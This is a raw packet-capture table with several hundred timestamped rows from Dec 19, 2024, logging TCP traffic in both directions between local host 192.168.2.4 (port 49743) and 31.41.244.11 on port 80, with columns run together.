                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.177515984 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.178663015 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.178766012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.178786039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.178857088 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.180309057 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.180423021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.180582047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.180665016 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.181898117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.182004929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.182018995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.182084084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.183597088 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.183609009 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.183690071 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.185094118 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.185107946 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.185198069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.185198069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.187778950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.187973022 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.188661098 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.188972950 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.189357042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.189416885 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.190124989 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.190259933 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.191010952 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.191024065 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.191098928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.193155050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.193171978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.193248987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.195907116 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.196141005 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.196670055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.196749926 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.197653055 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.197664976 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.197752953 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.199790001 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.199809074 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.199995995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.199995995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.201719046 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.201730967 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.201812029 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.202697039 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.202708006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.202783108 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.204534054 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.204546928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.204646111 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.205635071 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.205693960 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.206724882 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.206785917 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.207600117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.207686901 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.208573103 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.208655119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.209448099 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.209460974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.209705114 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.210254908 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.210325956 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.211076021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.211189985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.215683937 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.215697050 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.215806961 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.219449043 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.219460964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.219548941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.222040892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.222053051 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.222146988 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.223562002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.223572969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.223628044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.224414110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.224535942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.225275040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.225333929 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.226226091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.226238966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.226304054 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.227010965 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.227061987 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.227699995 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.227773905 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.228513002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.228529930 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.228590965 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.229258060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.229428053 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.230030060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.230093002 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.230110884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.230123997 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.230225086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231039047 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231050968 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231060982 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231105089 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231118917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231126070 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231165886 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231930971 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231942892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.231986046 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.233915091 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.233927011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.233980894 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.235554934 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.235567093 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.235610962 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.239248991 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.239262104 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.239331007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.242938042 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.243046045 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.243935108 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.243947983 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.243957996 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.243969917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244024992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244110107 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244879007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244890928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244901896 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244956017 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.244976997 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.245665073 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.245676994 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.245690107 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.245734930 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.245748043 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.246604919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.246620893 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.246637106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.246651888 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.246686935 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.246715069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.247524977 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.247538090 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.247550011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.247591019 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.247658968 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.248543978 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.248554945 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.248574018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.248621941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.248621941 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.249494076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.249506950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.249516964 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.249524117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.249582052 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.249582052 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.250289917 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.250302076 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.250314951 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.250368118 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.250369072 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.251189947 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.251244068 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.251256943 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.251280069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.251280069 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.251303911 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.252134085 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.252146006 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.252156973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.252167940 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.252192974 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.252268076 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253015041 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253052950 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253066063 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253103971 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253134012 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253983021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.253997087 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254009962 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254045963 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254103899 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254903078 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254915953 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254925966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254937887 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.254965067 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.255033970 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.255855083 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.255867004 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.255877972 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.255939007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.255939007 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.256736040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.256747961 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.256758928 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.256831884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.256831884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.257693052 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.257704973 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.257714987 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.257729053 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.257755995 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.257827044 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.258605003 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.258616924 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.258630037 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.258690119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.258690119 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.259685040 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.259696007 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.259706974 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.259772062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.259772062 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.260545969 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.260574102 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.260588884 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.260627031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.260627031 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.260647058 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.261383057 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.261395931 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.261421919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.261477947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.261477947 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.262263060 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.262305021 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.262316942 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.262327909 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.262386084 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.262418985 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.263200045 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.263211966 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.263223886 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.263261080 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.263331890 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.264161110 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.264173031 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.264183044 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.264195919 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.264249086 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.264257908 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265022993 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265036106 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265045881 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265095949 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265106916 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265957117 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.265966892 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.266011000 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.266313076 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.266551018 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.266562939 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.266624928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.266624928 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267066002 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267077923 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267256021 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267740011 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267751932 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267790079 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.267891884 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.268081903 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.268095016 CET804974331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.268146992 CET4974380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:33.268726110 CET804974331.41.244.11192.168.2.4
